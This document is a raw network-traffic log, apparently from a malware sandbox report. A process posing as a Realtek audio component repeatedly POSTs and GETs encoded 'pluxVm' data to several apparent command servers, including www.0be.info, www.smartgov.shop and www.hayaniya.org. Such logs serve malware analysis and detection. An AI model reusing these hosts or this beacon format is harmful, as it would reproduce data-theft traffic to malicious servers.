                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:54.362303019 CET | 935 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ6HVhxQIol6eeLbu15eF0NUhkrFETNzTO3a%2FwcIQVbYIGqhiwLO7n%2BRu0Hl1JKNDeoMj0SG4HUUAvT00IlCas1HlqMQsYpnFtHBQqMFK4IZUg%2FZO9VO0t1xSnAg3z%2B60n57FtbaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40ba97a144379-EWR
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=103071&min_rtt=103071&rtt_var=51535&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                                Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Dec 3, 2024 14:53:54.362385035 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49796 | 173.0.157.187 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:59.631959915 CET | 668 | OUT | POST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=bu17mgYybRGrF7Fvd8NUMpfuw/8LoTVke4OzFt4PNMqtShbHfQ5exZwLG44em4CtpYT9fJgC4GVphtSo04ZdZF+4S7mT/bxKadzG7oQTIMQsiXp2g9SHbqNWfncm5XjsYnQ0APMuy666yVv3dByrd+dw224Orh3FcitIuVjXK/F5FAV/gxZLMBJ2r+x8Z9bPkw==
Dec 3, 2024 14:53:59.878046989 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:59 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49797 | 173.0.157.187 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:02.295325041 CET | 688 | OUT | POST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:02.514297962 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 49798 | 173.0.157.187 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:04.969482899 CET | 1289 | OUT | POST /8h0h/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.0be.info
                                                                                                                                                                                                                                Referer: http://www.0be.info/8h0h/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:04.969508886 CET | 6548 | OUT
Dec 3, 2024 14:54:05.199466944 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:05 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 23V,VH(,JM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49799 | 173.0.157.187 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:07.636315107 CET | 415 | OUT | GET /8h0h/?pluxVm=WsdblX5oKRyaFeduXpZZBYfr3KMp+WtxHr+UJvo5A+6DW3eJEDxswcp5ZYJtgZW5p4zYKJkjyVN2mc228t1VZlr/R5LO29syDvrfnZcSIMlt6XRuzenYE6E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.0be.info
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:07.868633032 CET | 217 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: fLink is expired0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49800 | 13.248.169.48 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:13.115884066 CET | 683 | OUT | POST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49801 | 13.248.169.48 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:15.750148058 CET | 703 | OUT | POST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=hKt9jX66Sy01kN7FEG6kD6bJ+B2ADqo+ew9DTNIwYjGaXR4sr87vO1rxUgKkSnmu52vboqUuP/nqX6VkDERTzkmeJgH3xyI7j+UUh6y67+Slqp1HaQNCn6sM4ylYDLP7xxKnRvShcXUYyDvFE7ejZ11a0h+RZyw13OTPTcEBfutRtjWZBKfcvKTfLo4m6Y/s1dFbh40hIF4iugKUB0Q9I6o=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 49802 | 13.248.169.48 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:18.386698008 CET | 6445 | OUT | POST /1cwp/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.smartgov.shop
                                                                                                                                                                                                                                Referer: http://www.smartgov.shop/1cwp/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 49803 | 13.248.169.48 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:21.030231953 CET | 420 | OUT | GET /1cwp/?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo= HTTP/1.1
                                                                                                                                                                                                                                Host: www.smartgov.shop
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:21.141648054 CET | 397 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 257
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 49804 | 192.185.147.100 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:26.423396111 CET | 680 | OUT | POST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=dXrkYmyHwbJOZOfskLdcnjZ5mxTTMVyYE62zK20eKS11TT7UZYs/56gXf9eYG2iAPSjeNmqQTk5kvT/h7lAVOt6Y8tXZEFkx5p/eoWRpYyrJ6Rq9rvdM/I1ws4fn0Z8X2PbxaMZhFfByHmayZZHkgcCULjm1W2d7dfwHg7kLTRTbLxOs//YtedywH7SVxgmRZg==
Dec 3, 2024 14:54:26.872312069 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:26 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997052908 CET1289INData Raw: b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d 03 6d 77 db bd cb a1 c2 fe 9d 12 5d 89 0b 8f 72 d8 76
                                                                                                                                                                                                                                Data Ascii: `7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-;lL?]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49805 | 192.185.147.100 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:29.071538925 CET | 700 | OUT | POST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:29.582056046 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:29 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49806 | 192.185.147.100 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:54:31.727149010 CET | 2578 | OUT | POST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:32.164474964 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:31 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
48          192.168.11.20  49807        192.185.147.100  80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:54:34.381623030 CET  419                OUT        GET /vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:54:34.634823084 CET  490                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:34 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Location: http://hayaniya.org/vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
49          192.168.11.20  49808        176.31.209.107   80                7488  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp                           Bytes transferred  Direction  Data
Dec 3, 2024 14:54:40.113451004 CET  701                OUT        POST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 4b 51 6c 75 4e 30 2b 62 4a 62 2b 5a 76 47 78 51 70 52 66 4e 4e 6e 57 41 46 6f 57 6d 52 45 4a 69 45 44 30 6a 6b 75 2f 2f 69 4e 5a 57 68 56 50 45 55 43 62 7a 68 50 51 63 42 37 7a 58 38 79 55 32 63 54 68 5a 4e 59 46 7a 44 54 4f 6d 32 6c 69 56 55 78 73 69 6e 46 56 69 43 35 78 39 4b 68 7a 4e 58 44 47 52 51 72 69 65 31 65 69 51 6b 31 59 4a 6d 30 66 6a 57 70 70 77 56 39 38 53 46 74 76 30 4f 34 4e 57 57 65 4c 4e 44 44 4f 71 2f 39 51 69 4e 41 76 51 62 43 73 35 50 33 6a 78 6f 6e 36 4b 6b 67 56 59 69 72 57 41 4b 4d 73 61 2f 73 35 77 2b 75 44 76 48 38 59 48 79 64 6c 62 45 74 6f 79 34 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZvGxQpRfNNnWAFoWmREJiED0jku//iNZWhVPEUCbzhPQcB7zX8yU2cThZNYFzDTOm2liVUxsinFViC5x9KhzNXDGRQrie1eiQk1YJm0fjWppwV98SFtv0O4NWWeLNDDOq/9QiNAvQbCs5P3jxon6KkgVYirWAKMsa/s5w+uDvH8YHydlbEtoy4g==
Dec 3, 2024 14:54:40.809576035 CET  1289               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:39 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 37 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 77 77 77 2e 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
